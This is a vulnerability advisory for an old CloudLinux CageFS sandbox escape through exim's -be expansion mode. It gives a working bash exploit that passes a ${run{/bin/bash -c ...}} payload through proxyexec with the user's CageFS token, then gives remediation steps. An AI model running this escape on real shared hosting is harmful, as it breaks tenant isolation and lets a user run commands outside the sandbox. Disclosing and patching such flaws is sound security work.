ZSA-2016-1 - CloudLinux CageFS bypass through exim

Details: Created: 29 November 2019; Last Updated: 01 December 2019

Vulnerability

Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016, I no longer have original report)

CloudLinux CageFS can be bypassed by running exim in expansion testing mode.

Exim in expansion testing mode (-be) can execute commands through ${run{<command> <args>}{<string1>}{<string2>}} string expansion. Exim -be arguments are not filtered by proxyexec before executing exim outside CageFS, allowing user inside CageFS to execute commands outside CageFS.

Exploit

#!/bin/bash

if [[ $# -eq 0 ]]
then
    echo "Usage: $0 <command> [arg]..."
    exit 1
fi

OUTPUT_FILE=$(mktemp -p "${HOME}")

echo "\${run{/bin/bash -c \"$@ >${OUTPUT_FILE}\"}{foo}{bar}}" | /usr/sbin/proxyexec -c cagefs.sock "$USER" "$(cat /var/.cagefs/.cagefs.token)" "$(pwd)" EXIM -be
cat "${OUTPUT_FILE}"
rm "${OUTPUT_FILE}"

Solution

Update CageFS to unaffected version. Check if -be and -bem parameters are filtered in /etc/cagefs/filters/exim.json and /etc/cagefs/filters/sendmail.json.

Timeline

Unknown (old vulnerability from around 2016, I no longer have original report, it was fixed around 2016).